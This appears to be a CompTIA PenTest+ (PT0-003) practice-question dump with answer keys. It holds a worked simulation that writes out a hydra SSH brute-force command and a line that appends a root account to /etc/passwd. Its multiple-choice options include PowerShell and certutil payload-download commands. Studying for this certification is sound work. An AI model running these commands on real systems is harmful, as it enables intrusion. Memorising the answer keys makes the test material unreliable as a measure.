CompTIA PT0-003 問題集

質問 1：
While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?
A. The penetration test was not completed on time.
B. A full backup restoration is required for the server.
C. Configuration changes were not reverted.
D. The penetration tester was locked out of the system.
正解：C
解説: (Topexam メンバーにのみ表示されます)

質問 2：
A previous penetration test report identified a host with vulnerabilities that was successfully exploited. Management has requested that an internal member of the security team reassess the host to determine if the vulnerability still exists.

Part 1:
. Analyze the output and select the command to exploit the vulnerable service.
Part 2:
. Analyze the output from each command.
Select the appropriate set of commands to escalate privileges.
Identify which remediation steps should be taken.

正解：
See the Explanation below for complete solution.
Explanation:
The command that would most likely exploit the services is:
hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22
The appropriate set of commands to escalate privileges is:
echo "root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash" >> /etc/passwd
The remediations that should be taken after the successful privilege escalation are:
* Remove the SUID bit from cp.
* Make backup script not world-writable.
Comprehensive Step-by-Step Explanation of the Simulation
Part 1: Exploiting Vulnerable Service
* Nmap Scan Analysis
* Command: nmap -sC -T4 192.168.10.2
* Purpose: This command runs a default script scan with timing template 4 (aggressive).
* Output:
bash
Copy code
Port State Service
22/tcp open ssh
23/tcp closed telnet
80/tcp open http
111/tcp closed rpcbind
445/tcp open samba
3389/tcp closed rdp
Ports open are SSH (22), HTTP (80), and Samba (445).
* Enumerating Samba Shares
* Command: enum4linux -S 192.168.10.2
* Purpose: To enumerate Samba shares and users.
* Output:
makefile
Copy code
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x42]
user:[syslog] rid:[0x4ba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[lowpriv] rid:[0x3fa]
We identify a user lowpriv.
* Selecting Exploit Command
* Hydra Command: hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22
* Purpose: To perform a brute force attack on SSH using the lowpriv user and a list of the 500 worst passwords.
* Explanation:
* -l lowpriv: Specifies the username.
* -P 500-worst-passwords.txt: Specifies the password list.
* -t 4: Uses 4 tasks/threads for the attack.
* ssh://192.168.10.2:22: Specifies the SSH service and port.
* Executing the Hydra Command
* Result: Successful login as lowpriv user if a match is found.
Part 2: Privilege Escalation and Remediation
* Finding SUID Binaries and Configuration Files
* Command: find / -perm -2 -type f 2>/dev/null | xargs ls -l
* Purpose: To find world-writable files.
* Command: find / -perm -u=s -type f 2>/dev/null | xargs ls -l
* Purpose: To find files with SUID permission.
* Command: grep "/bin/bash" /etc/passwd | cut -d':' -f1-4,6,7
* Purpose: To identify users with bash shell access.
* Selecting Privilege Escalation Command
* Command: echo "root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash" >> /etc/passwd
* Purpose: To create a new root user entry in the passwd file.
* Explanation:
* root2: Username.
* 5ZOYXRFHVZ7OY: Password hash.
* ::0:0: User and group ID (root).
* /root: Home directory.
* /bin/bash: Default shell.
* Executing the Privilege Escalation Command
* Result: Creation of a new root user root2 with a specified password.
* Remediation Steps Post-Exploitation
* Remove SUID Bit from cp:
* Command: chmod u-s /bin/cp
* Purpose: Removing the SUID bit from cp to prevent misuse.
* Make Backup Script Not World-Writable:
* Command: chmod o-w /path/to/backup/script
* Purpose: Ensuring backup script is not writable by all users to prevent unauthorized modifications.
Execution and Verification
* Verifying Hydra Attack:
* Run the Hydra command and monitor for successful login attempts.
* Verifying Privilege Escalation:
* After appending the new root user to the passwd file, attempt to switch user to root2 and check root privileges.
* Implementing Remediation:
* Apply the remediation commands to secure the system and verify the changes have been implemented.
By following these detailed steps, one can replicate the simulation and ensure a thorough understanding of both the exploitation and the necessary remediations.

質問 3：
A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?
A. powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")
B. certutil.exe -f https://192.168.0.1/foo.exe bad.exe
C. rundll32.exe c:\path\foo.dll,functName
D. powershell.exe impo C:\tools\foo.ps1
正解：B
解説: (Topexam メンバーにのみ表示されます)

質問 4：
During an assessment, a penetration tester runs the following command:
setspn.exe -Q /
Which of the following attacks is the penetration tester preparing for?
A. Pass-the-hash
B. Kerberoasting
C. Dictionary
D. LDAP injection
正解：B
解説: (Topexam メンバーにのみ表示されます)

質問 5：
During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system.
The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?
A. bitsadmin.exe
B. certutil.exe
C. msconfig.exe
D. netsh.exe
正解：D
解説: (Topexam メンバーにのみ表示されます)

質問 6：
Given the following statements:
* Implement a web application firewall.
* Upgrade end-of-life operating systems.
* Implement a secure software development life cycle.
In which of the following sections of a penetration test report would the above statements be found?
A. Detailed findings
B. Attack narrative
C. Executive summary
D. Recommendations
正解：D
解説: (Topexam メンバーにのみ表示されます)

質問 7：
As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting. Which of the following techniques would be best for the tester to use?
A. Creating a scheduled task
B. Executing a process injection attack
C. Performing a credential-dumping attack
D. Establishing a reverse shell
正解：A
解説: (Topexam メンバーにのみ表示されます)